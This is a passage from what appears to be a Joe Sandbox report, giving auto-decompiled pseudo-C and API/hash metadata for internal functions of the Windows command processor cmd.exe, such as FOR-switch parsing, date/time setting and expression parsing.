                                    															memcpy(_t192, _v148, _t200);
                                    															_t193 = _t192 + _t200;
                                    															_t197 = _v152 + _v152;
                                    															memcpy(_t193,  *((intOrPtr*)(_t154[0xe] + _v132 * 4)) + 0x30, _t197);
                                    															_t179 = _v125;
                                    															_t206 = _t206 + 0x18;
                                    															_t194 = _t193 + _t197;
                                    															if(_t179 != 0) {
                                    																_t138 = 0x22;
                                    																 *_t194 = _t138;
                                    																_t194 =  &(_t194[0]);
                                    																_v125 = (_t138 & 0xffffff00 | _v144 != 0x00000000) - 0x00000001 & _t179;
                                    															}
                                    															_v140 = _v140 + 1;
                                    															 *_t194 = 0;
                                    															_t191 = _v132;
                                    														}
                                    													}
                                    													goto L54;
                                    												}
                                    												asm("sbb eax, eax");
                                    												_t125 = _t124 | 0x00000001;
                                    												_t197 = 0;
                                    												goto L37;
                                    											}
                                    											goto L54;
                                    										}
                                    										asm("sbb eax, eax");
                                    										_t123 = _t122 | 0x00000001;
                                    										goto L29;
                                    										L54:
                                    										_t191 = _t191 + 1;
                                    										_v132 = _t191;
                                    									} while (_t191 < _v156);
                                    								}
                                    								E011E0040(_t154[0xc]);
                                    								E011E0040(_t154[2]);
                                    								E011E0040(_t154);
                                    								E011E5D39();
                                    								_t105 = _v140;
                                    							}
                                    						}
                                    					}
                                    				}
                                    				return E011E6FD0(_t105, _t154, _v8 ^ _t205, _t187, _t191, _t197);
                                    			}


                                    APIs
                                      • Part of subcall function 011FB4DD: free.MSVCRT(?,0000000A,00000000,?,011F35C4), ref: 011FB4FB
                                      • Part of subcall function 011FB4DD: free.MSVCRT(?,0000000A,00000000,?,011F35C4), ref: 011FB508
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • longjmp.MSVCRT(0120B8B8,00000001,00000000,?,00000000), ref: 011FAF84
                                    • qsort.MSVCRT ref: 011FB007
                                    • wcschr.MSVCRT ref: 011FB05C
                                    • calloc.MSVCRT ref: 011FB09E
                                    • calloc.MSVCRT ref: 011FB16F
                                    • wcschr.MSVCRT ref: 011FB1B8
                                    • memcpy.MSVCRT ref: 011FB20A
                                    • memcpy.MSVCRT ref: 011FB22B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heapcallocfreememcpywcschr$AllocProcesslongjmpqsort
                                    • String ID: &()[]{}^=;!%'+,`~
                                    • API String ID: 975110957-381716982
                                    • Opcode ID: 00ce3fc47b8d2a4632742c067210552b94a09000676acfd28a0e68ab09a26601
                                    • Instruction ID: 44fc031d226dcfa23b8310eef3ae734f204c33c83a6329ed552545e2878315ba
                                    • Opcode Fuzzy Hash: 00ce3fc47b8d2a4632742c067210552b94a09000676acfd28a0e68ab09a26601
                                    • Instruction Fuzzy Hash: C2C1D276A082159BEB28CFACD8447AEBBB1FF48714F15406DEA48E7341EB309D41CB59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 45%
                                    			E011F3CC7(intOrPtr* __ecx, signed int __edx) {
                                    				signed int _v8;
                                    				char _v34;
                                    				short _v36;
                                    				char _v40;
                                    				char _v72;
                                    				char _v604;
                                    				struct _SYSTEMTIME _v620;
                                    				signed int _v624;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t38;
                                    				intOrPtr _t42;
                                    				intOrPtr _t43;
                                    				void* _t44;
                                    				void* _t48;
                                    				signed int _t50;
                                    				short* _t55;
                                    				void* _t61;
                                    				intOrPtr _t67;
                                    				signed int* _t78;
                                    				signed int _t87;
                                    				intOrPtr* _t88;
                                    				short* _t96;
                                    				signed int _t101;
                                    				intOrPtr* _t103;
                                    				void* _t108;
                                    				void* _t110;
                                    				signed int _t115;
                                    				void* _t118;
                                    				signed int _t119;
                                    				signed int* _t120;
                                    				short* _t122;
                                    				signed int _t123;
                                    				signed int _t124;
                                    				signed int _t127;
                                    				void* _t128;
                                    				void* _t129;
                                    
                                    				_t38 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t38 ^ _t127;
                                    				_t124 = __edx;
                                    				_t88 = __ecx;
                                    				if(__edx != 0) {
                                    					_t91 =  &_v34;
                                    					_v40 = 0x2e003a;
                                    					_v36 =  *0x11ff81c;
                                    					E011E1040( &_v34, 0xd, 0x11ff7fc);
                                    					goto L10;
                                    				} else {
                                    					_t122 = __edx + 0x10;
                                    					_t120 =  &_v40;
                                    					_t110 = L"/-." - _t120;
                                    					while(_t122 + 0x7fffffee != 0) {
                                    						_t87 =  *(_t110 + _t120) & 0x0000ffff;
                                    						if(_t87 == 0) {
                                    							break;
                                    						}
                                    						 *_t120 = _t87;
                                    						_t120 =  &(_t120[0]);
                                    						_t122 = _t122 - 1;
                                    						if(_t122 != 0) {
                                    							continue;
                                    						}
                                    						L7:
                                    						_t120 = _t120 - 2;
                                    						L8:
                                    						_t91 =  &_v40;
                                    						 *_t120 = 0;
                                    						E011E18C0( &_v40, 0x10, 0x11ff80c);
                                    						L10:
                                    						while(1) {
                                    							L10:
                                    							if(_t88 == 0 ||  *_t88 == 0) {
                                    								_t42 =  *0x11fd540; // 0x0
                                    								_t43 = _t42;
                                    								if(_t43 == 0) {
                                    									_t44 = 0x2342;
                                    								} else {
                                    									if(_t43 == 2) {
                                    										_t44 = 0x4000271d;
                                    									} else {
                                    										_t44 = 0x4000271e;
                                    									}
                                    								}
                                    								if(_t124 != 0) {
                                    									_push(0);
                                    									_push(0x2343);
                                    									E011DC108(_t91);
                                    									_t129 = _t128 + 8;
                                    								} else {
                                    									E011DC108(_t91, _t44, 1, 0x11ff80c);
                                    									_t129 = _t128 + 0xc;
                                    								}
                                    								__imp___get_osfhandle( &_v624);
                                    								_t128 = _t129 + 4;
                                    								_t113 =  &_v604;
                                    								if(E011F3B11( &_v624,  &_v604, 0, 0x104) == 0) {
                                    									goto L58;
                                    								} else {
                                    									_t50 = _v624;
                                    									if(_t50 == 0) {
                                    										goto L58;
                                    									}
                                    									 *((short*)(_t127 + _t50 * 2 - 0x258)) = 0;
                                    									_t96 =  &_v604;
                                    									_t51 = _v604;
                                    									if(_t51 == 0) {
                                    										L33:
                                    										if(E011E0178(_t51) == 0) {
                                    											_push( &_v604);
                                    											E011E25D9(L"%s\r\n");
                                    											_t128 = _t128 + 8;
                                    										}
                                    										goto L35;
                                    									}
                                    									_t119 = _t51 & 0x0000ffff;
                                    									while(_t119 != 0xa && _t119 != 0xd) {
                                    										_t51 =  *(_t96 + 2) & 0x0000ffff;
                                    										_t96 = _t96 + 2;
                                    										_t119 = _t51;
                                    										if(_t51 != 0) {
                                    											continue;
                                    										}
                                    										goto L33;
                                    									}
                                    									_t51 = 0;
                                    									 *_t96 = 0;
                                    									goto L33;
                                    								}
                                    							} else {
                                    								_t103 = _t88;
                                    								_t11 = _t103 + 2; // 0x2
                                    								_t113 = _t11;
                                    								do {
                                    									_t67 =  *_t103;
                                    									_t103 = _t103 + 2;
                                    								} while (_t67 != 0);
                                    								_t105 = _t103 - _t113 >> 1;
                                    								if(_t103 - _t113 >> 1 >= 0x104) {
                                    									_push(0);
                                    									asm("sbb esi, esi");
                                    									_push(_t124);
                                    									E011DC108(_t105);
                                    									L57:
                                    									L58:
                                    									_t48 = 1;
                                    									L59:
                                    									return E011E6FD0(_t48, _t88, _v8 ^ _t127, _t113, _t122, _t124);
                                    								}
                                    								E011E1040( &_v604, 0x105, _t88);
                                    								L35:
                                    								E011E1040( &_v72, 0x10,  &_v40);
                                    								_t115 = 0x10;
                                    								_t55 =  &_v72;
                                    								while( *_t55 != 0) {
                                    									_t55 = _t55 + 2;
                                    									_t115 = _t115 - 1;
                                    									if(_t115 != 0) {
                                    										continue;
                                    									}
                                    									break;
                                    								}
                                    								asm("sbb ecx, ecx");
                                    								_t101 =  ~_t115 & 0x00000010 - _t115;
                                    								if(_t115 == 0) {
                                    									L48:
                                    									_t113 =  &_v72;
                                    									_t122 = E011DEA40( &_v604,  &_v72, 2);
                                    									if( *_t122 == 0) {
                                    										L61:
                                    										_t48 = 0;
                                    										goto L59;
                                    									}
                                    									GetLocalTime( &_v620);
                                    									_t113 = _t122;
                                    									_t91 =  &_v620;
                                    									_push( &_v40);
                                    									if(_t124 != 0) {
                                    										_t61 = E011F4159( &_v620, _t113);
                                    									} else {
                                    										_t61 = E011F3FD4( &_v620, _t113);
                                    									}
                                    									if(_t61 == 0) {
                                    										L55:
                                    										_push(0);
                                    										asm("sbb eax, eax");
                                    										_push(( ~_t124 & 0x00000003) + 0x232f);
                                    										E011DC108(_t91);
                                    										_t128 = _t128 + 8;
                                    										_t88 = 0;
                                    										continue;
                                    									} else {
                                    										SetLocalTime( &_v620);
                                    										if(SetLocalTime( &_v620) != 0) {
                                    											goto L61;
                                    										}
                                    										if(GetLastError() == 0x522) {
                                    											_push(0);
                                    											_push(GetLastError());
                                    											E011DC5A2(_t91);
                                    											goto L57;
                                    										}
                                    										goto L55;
                                    									}
                                    								}
                                    								_t78 =  &_v72 + _t101 * 2;
                                    								_t118 = 0x10 - _t101;
                                    								if(0x10 == 0) {
                                    									L46:
                                    									_t78 = _t78 - 2;
                                    									L47:
                                    									 *_t78 = 0;
                                    									goto L48;
                                    								}
                                    								_t108 = 0x7ffffffe;
                                    								_t88 = ";" - _t78;
                                    								while(_t108 != 0) {
                                    									_t123 =  *(_t88 + _t78) & 0x0000ffff;
                                    									if(_t123 == 0) {
                                    										break;
                                    									}
                                    									 *_t78 = _t123;
                                    									_t108 = _t108 - 1;
                                    									_t78 =  &(_t78[0]);
                                    									_t118 = _t118 - 1;
                                    									if(_t118 != 0) {
                                    										continue;
                                    									}
                                    									goto L46;
                                    								}
                                    								if(_t118 != 0) {
                                    									goto L47;
                                    								}
                                    								goto L46;
                                    							}
                                    						}
                                    					}
                                    					if(_t122 != 0) {
                                    						goto L8;
                                    					}
                                    					goto L7;
                                    				}
                                    			}










































                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011F3DED
                                    • GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,002E003A), ref: 011F3F21
                                    • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,002E003A,?,002E003A), ref: 011F3F4E
                                    • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,002E003A), ref: 011F3F5B
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,002E003A), ref: 011F3F65
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,002E003A), ref: 011F3FC2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: LocalTime$ErrorLast$_get_osfhandle
                                    • String ID: %s$/-.$:
                                    • API String ID: 1033501010-879152773
                                    • Opcode ID: 98d0240bf57d487f5a7b0751c0276c171fe72203a98ac5a9918e94f9acb30018
                                    • Instruction ID: aaf4496f0f5f4ea29e44c89b40f291fba41fd36363e426528a8b77db2cf638fc
                                    • Opcode Fuzzy Hash: 98d0240bf57d487f5a7b0751c0276c171fe72203a98ac5a9918e94f9acb30018
                                    • Instruction Fuzzy Hash: 67812531A2022687EF2C9E78C859BEE33A5BF80304F44416CDA26D72D5EB719A46C752
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 50%
                                    			E011D9A26(void* __eax) {
                                    				void* __edi;
                                    				intOrPtr _t31;
                                    				signed short _t32;
                                    				intOrPtr _t36;
                                    				intOrPtr _t44;
                                    				int _t47;
                                    				intOrPtr _t52;
                                    				void* _t60;
                                    				void* _t70;
                                    				void* _t79;
                                    				void* _t80;
                                    				void* _t86;
                                    				void* _t87;
                                    				void* _t88;
                                    				void* _t89;
                                    				void* _t90;
                                    				void* _t91;
                                    				void* _t94;
                                    				signed int _t96;
                                    				intOrPtr* _t101;
                                    
                                    				_t96 = 0;
                                    				__imp___wcsicmp(L"FOR/?", 0x120faa0);
                                    				_t102 = __eax;
                                    				if(__eax == 0) {
                                    					 *0x120faa6 = 0;
                                    					_t96 = 1;
                                    				}
                                    				_t63 = 0x2b;
                                    				 *0x120fa8c = 0x1e;
                                    				_t101 = E011DE9A0(_t63, _t102);
                                    				_t31 = 0x2f;
                                    				if(_t96 != 0) {
                                    					 *0x120faa0 = _t31;
                                    					_t32 = 0x3f;
                                    					 *0x120faa2 = _t32;
                                    					 *0x120faa4 = 0;
                                    				} else {
                                    					_t63 = 0;
                                    					E011DF030(0);
                                    				}
                                    				_t88 = 0x2b;
                                    				if(E011DDCE1(_t60, _t88, _t96) != 0) {
                                    					 *(_t101 + 0x38) =  *(_t101 + 0x38) & 0x00000000;
                                    					 *_t101 = 0x3c;
                                    					goto L18;
                                    				} else {
                                    					 *(_t101 + 0x48) =  *(_t101 + 0x48) & 0x00000000;
                                    					_t36 = 0x25;
                                    					if( *0x1213cc9 == 0) {
                                    						L13:
                                    						if( *0x120faa0 != _t36) {
                                    							L45:
                                    							E011F82EB(_t63);
                                    							L17:
                                    							_push(0x120faa0);
                                    							_push( *(_t101 + 0x38));
                                    							_t89 = 0x1e;
                                    							E011D9C73( *(_t101 + 0x38), _t89);
                                    							E011D9C4D(L"IN");
                                    							_push(0x120faa0);
                                    							_push( *(_t101 + 0x38));
                                    							_t90 = 0x1e;
                                    							E011D9C73( *(_t101 + 0x38), _t90);
                                    							 *((intOrPtr*)(_t101 + 0x3c)) = E011D9936(_t60);
                                    							E011D9C4D(L"DO");
                                    							_push(0x120faa0);
                                    							_t91 = 8;
                                    							E011E1040( *(_t101 + 0x38) + 0x2c, _t91);
                                    							_t70 = 0x2b;
                                    							_t44 = E011DDC74(_t60, _t70);
                                    							 *((intOrPtr*)(_t101 + 0x40)) = _t44;
                                    							if(_t44 == 0) {
                                    								E011F82EB(_t70);
                                    							}
                                    							L18:
                                    							return _t101;
                                    						}
                                    						_t47 = iswspace( *0x120faa2 & 0x0000ffff);
                                    						_pop(_t63);
                                    						if(_t47 != 0) {
                                    							goto L45;
                                    						}
                                    						_t63 = L"=,;";
                                    						 *(_t101 + 0x44) =  *0x120faa2 & 0x0000ffff;
                                    						if(E011DD7D4(L"=,;",  *0x120faa2 & 0x0000ffff) != 0 ||  *0x120fa8c != 3) {
                                    							goto L45;
                                    						} else {
                                    							goto L17;
                                    						}
                                    					} else {
                                    						while(1) {
                                    							__imp___wcsicmp(L"/L", 0x120faa0);
                                    							if(_t36 == 0) {
                                    								goto L30;
                                    							}
                                    							L7:
                                    							__imp___wcsicmp(L"/D", 0x120faa0);
                                    							if(_t36 == 0) {
                                    								 *(_t101 + 0x48) =  *(_t101 + 0x48) | 0x00000002;
                                    								L25:
                                    								_t36 = E011DF030(0);
                                    								while(1) {
                                    									__imp___wcsicmp(L"/L", 0x120faa0);
                                    									if(_t36 == 0) {
                                    										goto L30;
                                    									}
                                    									goto L7;
                                    								}
                                    								goto L30;
                                    							}
                                    							__imp___wcsicmp(L"/F", 0x120faa0);
                                    							if(_t36 == 0) {
                                    								 *(_t101 + 0x48) =  *(_t101 + 0x48) | 0x00000008;
                                    								E011DF030(0);
                                    								_t36 =  *0x120faa0;
                                    								_t79 = 0x25;
                                    								__eflags = _t36 - _t79;
                                    								if(_t36 == _t79) {
                                    									continue;
                                    								}
                                    								_t80 = 0x2f;
                                    								__eflags = _t36 - _t80;
                                    								if(_t36 == _t80) {
                                    									continue;
                                    								}
                                    								__eflags =  *((intOrPtr*)(_t101 + 0x4c));
                                    								if( *((intOrPtr*)(_t101 + 0x4c)) != 0) {
                                    									E011F82EB(_t80);
                                    								}
                                    								_t63 = 6 +  *0x120fa8c * 2;
                                    								_t52 = E011E00B0(_t63);
                                    								__eflags = _t52;
                                    								if(_t52 == 0) {
                                    									L41:
                                    									E011F9287(_t63);
                                    									__imp__longjmp(0x120b8b8, 1);
                                    									L42:
                                    									__eflags = _t63 - 6;
                                    									if(_t63 != 6) {
                                    										__eflags = _t63 - 4;
                                    										if(_t63 != 4) {
                                    											E011F82EB(_t63);
                                    										}
                                    									}
                                    									L12:
                                    									_t36 = 0x25;
                                    									goto L13;
                                    								} else {
                                    									_t94 =  *0x120fa8c + 3;
                                    									L24:
                                    									 *((intOrPtr*)(_t101 + 0x4c)) = _t52;
                                    									E011E1040(_t52, _t94, 0x120faa0);
                                    									goto L25;
                                    								}
                                    							}
                                    							__imp___wcsicmp(L"/R", 0x120faa0);
                                    							_t63 =  *(_t101 + 0x48);
                                    							if(_t36 == 0) {
                                    								 *(_t101 + 0x48) = _t63 | 0x00000004;
                                    								E011DF030(0);
                                    								__eflags =  *((intOrPtr*)(_t101 + 0x4c));
                                    								if( *((intOrPtr*)(_t101 + 0x4c)) != 0) {
                                    									E011F82EB(0);
                                    								}
                                    								_t36 =  *0x120faa0;
                                    								_t86 = 0x25;
                                    								__eflags = _t36 - _t86;
                                    								if(_t36 == _t86) {
                                    									continue;
                                    								} else {
                                    									_t87 = 0x2f;
                                    									__eflags = _t36 - _t87;
                                    									if(_t36 == _t87) {
                                    										continue;
                                    									}
                                    									_t63 = 2 +  *0x120fa8c * 2;
                                    									_t52 = E011E00B0(_t63);
                                    									__eflags = _t52;
                                    									if(_t52 == 0) {
                                    										goto L41;
                                    									}
                                    									_t94 =  *0x120fa8c + 1;
                                    									goto L24;
                                    								}
                                    							}
                                    							if(_t63 == 0 || _t63 == 8) {
                                    								goto L12;
                                    							} else {
                                    								__eflags = _t63 - 2;
                                    								if(_t63 == 2) {
                                    									goto L12;
                                    								}
                                    								__eflags = _t63 - 1;
                                    								if(_t63 == 1) {
                                    									goto L12;
                                    								}
                                    								goto L42;
                                    							}
                                    							L30:
                                    							 *(_t101 + 0x48) =  *(_t101 + 0x48) | 1;
                                    							goto L25;
                                    						}
                                    					}
                                    				}
                                    			}























                                    0x00000000
                                    0x00000000
                                    0x011d9be2
                                    0x011d9be6
                                    0x011d9c46
                                    0x011d9c46
                                    0x011d9bed
                                    0x011d9bf4
                                    0x011d9bf9
                                    0x011d9bfb
                                    0x011f1127
                                    0x011f1127
                                    0x011f1132
                                    0x011f1138
                                    0x011f1138
                                    0x011f113b
                                    0x011f1141
                                    0x011f1144
                                    0x011f114a
                                    0x011f114a
                                    0x011f1144
                                    0x011d9b07
                                    0x011d9b09
                                    0x00000000
                                    0x011d9c01
                                    0x011d9c07
                                    0x011d9c0a
                                    0x011d9c11
                                    0x011d9c14
                                    0x00000000
                                    0x011d9c14
                                    0x011d9bfb
                                    0x011d9ae7
                                    0x011d9aef
                                    0x011d9af4
                                    0x011f10d1
                                    0x011f10d6
                                    0x011f10db
                                    0x011f10df
                                    0x011f10e1
                                    0x011f10e1
                                    0x011f10e6
                                    0x011f10ee
                                    0x011f10ef
                                    0x011f10f2
                                    0x00000000
                                    0x011f10f8
                                    0x011f10fa
                                    0x011f10fb
                                    0x011f10fe
                                    0x00000000
                                    0x00000000
                                    0x011f1109
                                    0x011f1110
                                    0x011f1115
                                    0x011f1117
                                    0x00000000
                                    0x00000000
                                    0x011f111f
                                    0x00000000
                                    0x011f111f
                                    0x011f10f2
                                    0x011d9afc
                                    0x00000000
                                    0x011d9c25
                                    0x011d9c25
                                    0x011d9c28
                                    0x00000000
                                    0x00000000
                                    0x011d9c2e
                                    0x011d9c30
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d9c36
                                    0x011d9c41
                                    0x011d9c41
                                    0x00000000
                                    0x011d9c41
                                    0x011d9a8f
                                    0x011d9a8a

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsicmp$iswspace
                                    • String ID: =,;$FOR/?
                                    • API String ID: 759518647-2121398454
                                    • Opcode ID: b77ce97a736d4013ad29b70013c95d69b8778377815fbea10cd2448db8cd1092
                                    • Instruction ID: 62e96f59beb866161447ff4f1d43b5cbffa754f38dadb6dd76477d9074248b0a
                                    • Opcode Fuzzy Hash: b77ce97a736d4013ad29b70013c95d69b8778377815fbea10cd2448db8cd1092
                                    • Instruction Fuzzy Hash: EF6113313407429BEB3DAB7AF95DB7A37A0EB9061CF54411EE2038A9C1EF71A482C715
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 28%
                                    			E011D64DC(void* __eflags, intOrPtr _a4, wchar_t* _a8, long _a12, intOrPtr _a16) {
                                    				char _v8;
                                    				char _v12;
                                    				char _v28;
                                    				signed short* _t39;
                                    				short* _t45;
                                    				int _t50;
                                    				wchar_t* _t54;
                                    				long _t55;
                                    				long _t62;
                                    				signed int _t71;
                                    
                                    				E011D9794( &_a8);
                                    				_t39 = _a8;
                                    				_t62 =  *_t39 & 0x0000ffff;
                                    				if(_t62 == 0) {
                                    					L22:
                                    					_a16 = 0x400023cd;
                                    					L9:
                                    					L10:
                                    					asm("movsd");
                                    					asm("movsd");
                                    					asm("movsd");
                                    					return _a4;
                                    				}
                                    				if(_t62 == 0x28) {
                                    					_a8 =  &(_t39[1]);
                                    					_push( &_v28);
                                    					asm("movsd");
                                    					asm("movsd");
                                    					asm("movsd");
                                    					E011D6355();
                                    					asm("movsd");
                                    					asm("movsd");
                                    					asm("movsd");
                                    					__eflags = _a16;
                                    					if(_a16 != 0) {
                                    						L21:
                                    						goto L10;
                                    					}
                                    					E011D9794( &_a8);
                                    					_t45 = _a8;
                                    					__eflags =  *_t45 - 0x29;
                                    					if( *_t45 != 0x29) {
                                    						_a16 = 0x400023cc;
                                    					} else {
                                    						_a8 = _t45 + 2;
                                    					}
                                    					goto L9;
                                    				}
                                    				if(wcschr(L"+-~!", _t62) != 0) {
                                    					_a8 =  &(_a8[0]);
                                    					_push( &_v28);
                                    					asm("movsd");
                                    					asm("movsd");
                                    					asm("movsd");
                                    					E011D64DC(__eflags);
                                    					asm("movsd");
                                    					asm("movsd");
                                    					asm("movsd");
                                    					__eflags = _a16;
                                    					if(_a16 != 0) {
                                    						goto L21;
                                    					}
                                    					E011D4409( &_a8, _t62, _a12);
                                    					goto L9;
                                    				}
                                    				_t50 = iswdigit(_t62);
                                    				if(_t50 == 0) {
                                    					__eflags = E011D6785( &_a8,  &_v12, __eflags,  &_v8);
                                    					if(__eflags == 0) {
                                    						goto L22;
                                    					} else {
                                    						_a12 = E011D60DE(_v8, __eflags);
                                    						goto L9;
                                    					}
                                    				}
                                    				__imp___errno();
                                    				 *_t50 = 0;
                                    				_t54 = _a8;
                                    				if( *_t54 == 0x30) {
                                    					_t71 = _t54[0] & 0x0000ffff;
                                    					__eflags = _t71 - 0x78;
                                    					if(_t71 == 0x78) {
                                    						L24:
                                    						_t55 = wcstoul(_t54,  &_a8, 0);
                                    						L6:
                                    						_a12 = _t55;
                                    						if(_t55 == 0x7fffffff) {
                                    							__imp___errno();
                                    							__eflags =  *_t55 - 0x22;
                                    							if( *_t55 != 0x22) {
                                    								goto L7;
                                    							}
                                    							_a16 = 0x400023d0;
                                    							goto L9;
                                    						}
                                    						L7:
                                    						if(iswdigit( *_a8 & 0x0000ffff) != 0 || iswalpha( *_a8 & 0x0000ffff) != 0) {
                                    							_a16 = 0x400023cf;
                                    						}
                                    						goto L9;
                                    					}
                                    					__eflags = _t71 - 0x58;
                                    					if(_t71 != 0x58) {
                                    						goto L5;
                                    					}
                                    					goto L24;
                                    				}
                                    				L5:
                                    				_t55 = wcstol(_t54,  &_a8, 0);
                                    				goto L6;
                                    			}














                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                    • String ID: +-~!
                                    • API String ID: 2191331888-2604099254
                                    • Opcode ID: 7de3c2ad85934e3951e43913ffc15c5663041ac727e63ba5b3ca1c4b7ddd9602
                                    • Instruction ID: 60309befc6834d5d1945c4748cbbe6b9b343a600474319de1283a0dbaf62c571
                                    • Opcode Fuzzy Hash: 7de3c2ad85934e3951e43913ffc15c5663041ac727e63ba5b3ca1c4b7ddd9602
                                    • Instruction Fuzzy Hash: CC51B071800609EFCF1DDF68E8489AB3BA4EF15364F51811AFC169B184EB74DA94CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 93%
                                    			E011F213A(void* __ecx, intOrPtr* __edx) {
                                    				void* _v0;
                                    				long _v8;
                                    				long _v12;
                                    				long _t11;
                                    				void* _t16;
                                    				long _t18;
                                    				intOrPtr* _t41;
                                    				void* _t44;
                                    
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_t44 = __ecx;
                                    				_t41 = __edx;
                                    				_t11 = WaitForSingleObject(__ecx, 0);
                                    				if(_t11 != 0xffffffff) {
                                    					if(_t11 == 0 || _t11 == 0x102) {
                                    						_v8 = 0;
                                    						if(_t11 != 0) {
                                    							_v12 = 0;
                                    							if(ReleaseSemaphore(_t44, 1,  &_v12) != 0) {
                                    								if(_v12 == 0) {
                                    									if(ReleaseSemaphore(_t44, 1, 0) != 0 || GetLastError() != 0x12a) {
                                    										goto L24;
                                    									} else {
                                    										_t18 = WaitForSingleObject(_t44, 0);
                                    										if(_t18 != 0xffffffff) {
                                    											if(_t18 == 0) {
                                    												goto L22;
                                    											} else {
                                    												goto L24;
                                    											}
                                    										} else {
                                    											goto L2;
                                    										}
                                    									}
                                    								} else {
                                    									goto L24;
                                    								}
                                    							} else {
                                    								goto L2;
                                    							}
                                    						} else {
                                    							if(ReleaseSemaphore(_t44, 1,  &_v8) != 0) {
                                    								_v8 = _v8 + 1;
                                    								if(ReleaseSemaphore(_t44, 1, 0) != 0 || GetLastError() != 0x12a) {
                                    									goto L24;
                                    								} else {
                                    									L22:
                                    									 *_t41 = _v8;
                                    									_t16 = 0;
                                    								}
                                    							} else {
                                    								goto L2;
                                    							}
                                    						}
                                    					} else {
                                    						L24:
                                    						E011F292C("wil", 0x8000ffff);
                                    						_t16 = 0x8000ffff;
                                    					}
                                    				} else {
                                    					L2:
                                    					_t16 = E011F2913("wil");
                                    				}
                                    				return _t16;
                                    			}












                                    APIs
                                    • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,?,00000000,?,00000000,00000000,?,011F2CF5), ref: 011F214C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ObjectSingleWait
                                    • String ID: wil
                                    • API String ID: 24740636-1589926490
                                    • Opcode ID: 0d9749f68f082dfa7dc224af61c816a73574b999e59430d4e99bfa56b4569228
                                    • Instruction ID: 449603242a98b89dcc6024e88fb28d9ddfc6f3ae99c9e356955644bf3ea0ab5c
                                    • Opcode Fuzzy Hash: 0d9749f68f082dfa7dc224af61c816a73574b999e59430d4e99bfa56b4569228
                                    • Instruction Fuzzy Hash: 14319538705215ABFB298A69AC88BBB3669EF81354F20413DFB01D7285D774CD428757
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 77%
                                    			E011F7C83(void* __ebx, intOrPtr __edx, intOrPtr _a4, long _a8, char _a16) {
                                    				signed int _v12;
                                    				char _v44;
                                    				short _v112;
                                    				short _v116;
                                    				char* _v120;
                                    				char* _v124;
                                    				char* _v128;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t24;
                                    				long _t29;
                                    				void* _t33;
                                    				signed int _t38;
                                    				char* _t43;
                                    				long _t46;
                                    				void* _t47;
                                    				intOrPtr _t59;
                                    				signed int _t60;
                                    
                                    				_t56 = __edx;
                                    				_t47 = __ebx;
